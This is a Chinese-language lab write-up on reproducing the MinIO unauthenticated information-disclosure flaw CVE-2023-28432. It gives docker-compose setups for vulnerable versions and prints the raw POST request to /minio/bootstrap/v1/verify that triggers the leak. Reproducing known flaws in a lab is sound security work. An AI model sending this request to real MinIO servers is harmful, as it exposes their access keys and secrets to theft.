MinIO未授权信息泄露(CVE-2023-28432)
漏洞范围:
MinIO RELEASE.2019-12-17T23-16-33Z <= version < MinIO RELEASE.2023-03-20T20-16-18Z
一、低版本
docker-compose.yml
version: '3.7'
services:
minio1:
image: minio/minio:RELEASE.2021-01-16T02-19-44Z
volumes:
- data1-1:/data1
- data1-2:/data2
ports:
- "9000:9000"
environment:
MINIO_ACCESS_KEY: minio
MINIO_SECRET_KEY: minio123
command: server http://minio{1...4}/data{1...2}
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
interval: 30s
timeout: 20s
retries: 3
## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
data1-1:
data1-2:
启动
[root@localhost momo]# [root@localhost momo]# docker-compose -f docker-compose2.yml up Building with native build. Learn about native build in Compose here: https://docs.docker.com/go/compose-native-build/ Pulling minio1 (minio/minio:RELEASE.2021-01-16T02-19-44Z)... RELEASE.2021-01-16T02-19-44Z: Pulling from minio/minio a6b97b4963f5: Pull complete 13948a011eec: Pull complete b27f7b93c977: Pull complete 527a35f50a95: Pull complete bae74d83b250: Pull complete 0f5c2801c42c: Pull complete 23c30f3146bf: Pull complete Digest: sha256:a176d2194523a587f4103bce5e8d408e7aadc737e7e67067ca9c195a2b69fbe4 Status: Downloaded newer image for minio/minio:RELEASE.2021-01-16T02-19-44Z Recreating momo_minio1_1 ... done
启动之后需要等等。大概一分钟左右。才能访问
访问一下
测试一下
POST /minio/bootstrap/v1/verify HTTP/1.1 Host: 192.168.69.81:9000 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
低版本发现会啥信息都没有。
二、高版本
version: '3.7'
# starts 4 docker containers running minio server instances. Each
# minio server's web interface will be accessible on the host at port
# 9001 through 9004.
services:
minio1:
image: minio/minio:RELEASE.2023-01-31T02-24-19Z
container_name: minio1
volumes:
- data1-1:/data1
- data1-2:/data2
ports:
- "9001:9000"
environment:
MINIO_ACCESS_KEY: minio
MINIO_SECRET_KEY: minio123
command: server http://minio{1...4}/data{1...2}
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
interval: 30s
timeout: 20s
retries: 3
minio2:
image: minio/minio:RELEASE.2023-01-31T02-24-19Z
container_name: minio2
volumes:
- data2-1:/data1
- data2-2:/data2
ports:
- "9002:9000"
environment:
MINIO_ACCESS_KEY: minio
MINIO_SECRET_KEY: minio123
command: server http://minio{1...4}/data{1...2}
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
interval: 30s
timeout: 20s
retries: 3
minio3:
image: minio/minio:RELEASE.2023-01-31T02-24-19Z
container_name: minio3
volumes:
- data3-1:/data1
- data3-2:/data2
ports:
- "9003:9000"
environment:
MINIO_ACCESS_KEY: minio
MINIO_SECRET_KEY: minio123
command: server http://minio{1...4}/data{1...2}
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
interval: 30s
timeout: 20s
retries: 3
minio4:
image: minio/minio:RELEASE.2023-01-31T02-24-19Z
container_name: minio4
volumes:
- data4-1:/data1
- data4-2:/data2
ports:
- "9004:9000"
environment:
MINIO_ACCESS_KEY: minio
MINIO_SECRET_KEY: minio123
command: server http://minio{1...4}/data{1...2}
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
interval: 30s
timeout: 20s
retries: 3
## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
data1-1:
data1-2:
data2-1:
data2-2:
data3-1:
data3-2:
data4-1:
data4-2:
启动一下:
POST /minio/bootstrap/v1/verify HTTP/1.1 Host: 192.168.69.81:9000 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
